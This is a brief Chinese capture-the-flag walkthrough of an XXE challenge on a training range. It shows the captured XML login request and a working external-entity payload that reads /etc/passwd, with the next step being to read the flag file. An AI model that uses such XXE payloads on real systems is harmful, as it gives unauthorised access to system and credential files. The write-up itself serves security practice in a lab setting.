链接地址:http://47.103.94.191:8016/
1、进入安鸾靶场,进入环境。
发现是个登陆界面,尝试登陆发现有回显
2、利用burp suite抓包查看数据库。
发现是xml数据的提交,利用外部实体注入读取用户的账户文件,确定存在XXE漏洞
payload:
<?xml version="1.0"encoding="UTF-8"?>
<!DOCTYPE c[<!ENTITY admin SYSTEM "file:///etc/passwd">]>
根据题目提示已知文件名叫flag在根目录下,继续进行读取